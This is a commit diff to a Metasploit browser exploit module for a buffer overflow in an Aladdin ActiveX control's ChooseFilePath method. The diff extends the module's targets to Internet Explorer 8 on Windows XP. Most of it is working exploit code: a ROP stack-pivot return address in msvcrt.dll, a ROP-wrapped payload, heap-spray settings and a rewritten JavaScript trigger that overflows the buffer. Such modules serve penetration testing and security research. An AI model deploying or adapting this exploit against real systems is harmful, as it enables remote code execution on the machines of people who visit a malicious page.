added ie8 target

Author: jvazquez-r7

modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb

@@ -12,11 +12,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpServer::HTML
 	include Msf::Exploit::Remote::BrowserAutopwn
+	include Msf::Exploit::RopDb
 
 	autopwn_info({
 		:ua_name    => HttpClients::IE,
 		:ua_minver  => "6.0",
-		:ua_maxver  => "7.0",
+		:ua_maxver  => "8.0",
 		:javascript => true,
 		:os_name    => OperatingSystems::WINDOWS,
 		:rank       => Rank,
@@ -37,12 +38,15 @@ def initialize(info={})
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'b33f',   #Original
-					'sinn3r'  #Metasploit
+					'shinnai',       #Vulnerability Discovery
+					'b33f',          #Original exploit
+					'sinn3r',        #Metasploit
+					'juan vazquez'   #Metasploit, IE8 target
 				],
 			'References'     =>
 				[
 					[ 'OSVDB', '86723' ],
+					[ 'EDB',   '22258' ],
 					[ 'EDB',   '22301' ]
 				],
 			'Payload'        =>
@@ -57,10 +61,34 @@ def initialize(info={})
 			'Targets'        =>
 				[
 					[ 'Automatic', {} ],
-					[ 'IE 6 on Windows XP SP3', { 'Offset' => '0x5F4' } ],
-					[ 'IE 7 on Windows XP SP3', { 'Offset' => '0x5F4' } ],
-					[ 'IE 8 on Windows XP SP3', { 'Offset' => '0x5f4' } ],
-					[ 'IE 7 on Windows Vista',  { 'Offset' => '0x5f4' } ]
+					[ 'IE 6 on Windows XP SP3',
+						{
+							'Rop' => false,
+							'Offset' => '0x5F4',
+							'Ret' => 0x0c0c0c0c
+						}
+					],
+					[ 'IE 7 on Windows XP SP3',
+						{
+							'Rop' => false,
+							'Offset' => '0x5F4',
+							'Ret' => 0x0c0c0c0c
+						}
+					],
+					[ 'IE 8 on Windows XP SP3',
+						{
+							'Rop' => true,
+							'Offset' => '0x5f6',
+							'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
+						}
+					],
+					[ 'IE 7 on Windows Vista',
+						{
+							'Rop' => false,
+							'Offset' => '0x5F4',
+							'Ret' => 0x0c0c0c0c
+						}
+					]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Apr 1 2012",
@@ -104,7 +132,6 @@ def get_target(agent)
 	def ie_heap_spray(my_target, p)
 		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
 		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
-		js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
 
 		# Land the payload at 0x0c0c0c0c
 
@@ -135,7 +162,13 @@ def ie_heap_spray(my_target, p)
 	end
 
 	def load_exploit_html(my_target, cli)
-		p     = payload.encoded
+
+		if my_target['Rop']
+			p = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
+		else
+			p = payload.encoded
+		end
+
 		spray = ie_heap_spray(my_target, p)
 
 		html = %Q|
@@ -144,9 +177,9 @@ def load_exploit_html(my_target, cli)
 		<script>
 		#{spray}
 
-		var junk = unescape("%0c%0c%0c%0c");
-		while (junk.length < 2000) junk += junk;
-		pwnd.ChooseFilePath(junk);
+		junk='';
+		for( counter=0; counter<=267; counter++) junk+=unescape("%0c");
+		pwnd.ChooseFilePath(junk + "#{Rex::Text.to_hex([my_target.ret].pack("V"))}");
 		</script>
 		</html>
 		|